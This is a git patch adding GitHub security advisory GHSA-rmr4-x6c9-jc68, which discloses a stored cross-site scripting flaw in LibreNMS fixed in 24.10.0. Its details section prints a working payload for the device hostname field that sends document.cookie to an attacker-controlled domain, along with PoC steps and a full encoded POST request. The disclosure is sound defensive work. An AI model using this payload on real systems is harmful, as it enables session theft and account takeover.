From 635723a91a145692ebe393386e14f404b063346b Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 15 Nov 2024 15:29:19 +0000 Subject: [PATCH] Publish GHSA-rmr4-x6c9-jc68 --- .../GHSA-rmr4-x6c9-jc68.json | 64 +++++++++++++++++++ 1 file changed, 64 insertions(+) create mode 100644 advisories/github-reviewed/2024/11/GHSA-rmr4-x6c9-jc68/GHSA-rmr4-x6c9-jc68.json diff --git a/advisories/github-reviewed/2024/11/GHSA-rmr4-x6c9-jc68/GHSA-rmr4-x6c9-jc68.json b/advisories/github-reviewed/2024/11/GHSA-rmr4-x6c9-jc68/GHSA-rmr4-x6c9-jc68.json new file mode 100644 index 00000000000..abadf015377 --- /dev/null +++ b/advisories/github-reviewed/2024/11/GHSA-rmr4-x6c9-jc68/GHSA-rmr4-x6c9-jc68.json @@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rmr4-x6c9-jc68", + "modified": "2024-11-15T15:28:25Z", + "published": "2024-11-15T15:27:42Z", + "aliases": [ + "CVE-2024-49764" + ], + "summary": "LibreNMS has a Stored XSS ('Cross-site Scripting') in librenms/includes/html/pages/device/capture.inc.php", + "details": "### Summary\nA Stored Cross-Site Scripting (XSS) vulnerability in the \"Capture Debug Information\" page allows authenticated users to inject arbitrary JavaScript through the \"hostname\" parameter when creating a new device. This vulnerability results in the execution of malicious code when the \"Capture Debug Information\" page is visited, redirecting the user and sending non-httponly cookies to an attacker-controlled domain.\n\n### Details\nWhen creating a new device, an attacker can inject the following XSS payload into the \"hostname\" parameter:\n\n```\ntest'\" autofocus onfocus=\"document.location='https:///logger.php?c='+document.cookie\"\n```\n\n(Note: You may need to URL-encode the '+' sign in the payload.)\n\nThe payload triggers automatically when visiting the \"Capture Debug Information\" page for the device, redirecting the user's browser to the attacker-controlled domain along with any non-httponly cookies.\n\nThe vulnerability is due to insufficient sanitization of the \"url\" variable before it is output in the HTML. This is evident in the following lines of code:\n\nhttps://github.com/librenms/librenms/blob/7f2ae971c4a565b0d7345fa78b4211409f96800a/includes/html/pages/device/capture.inc.php#L55\n\n### PoC\n1. Create a new device with the following payload in the \"hostname\" parameter:\n```\ntest'\" autofocus onfocus=\"document.location='https:///logger.php?c='+document.cookie\"\n```\n2. Save the device.\n3. Navigate to the \"Capture Debug Information\" page for the device.\n4. Observe that the injected script triggers and redirects the user to the attacker's domain, sending cookies.\n\nExample Request:\n```http\nPOST /addhost HTTP/1.1\nHost: \nContent-Type: application/x-www-form-urlencoded\nCookie: \n\n_token=&hostname=test%27%22+autofocus+onfocus%3D%22document.location%3D%27https%3A%2F%2F%2Flogger.php%3Fc%3D%27%2bdocument.cookie%22&snmp=on&sysName=&hardware=&os=&os_id=&snmpver=v2c&port=&transport=udp&port_assoc_mode=ifIndex&community=&authlevel=noAuthNoPriv&authname=&authpass=&authalgo=SHA&cryptopass=&cryptoalgo=AES&force_add=on&Submit=\n```\n\n### Impact\n\nThis vulnerability allows authenticated users to execute arbitrary JavaScript in the context of other users' sessions when they visit the \"Capture Debug Information\" page of the device. The attacker can redirect the user to a malicious domain and capture non-httponly cookies, potentially compromising the user's account and allowing unauthorized actions.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "librenms/librenms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "24.10.0" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 24.9.1" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/librenms/librenms/security/advisories/GHSA-rmr4-x6c9-jc68" + }, + { + "type": "WEB", + "url": "https://github.com/librenms/librenms/commit/af15eabbb1752985d36f337cecf137a947e170f6" + }, + { + "type": "PACKAGE", + "url": "https://github.com/librenms/librenms" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-11-15T15:27:42Z", + "nvd_published_at": null + } +} \ No newline at end of file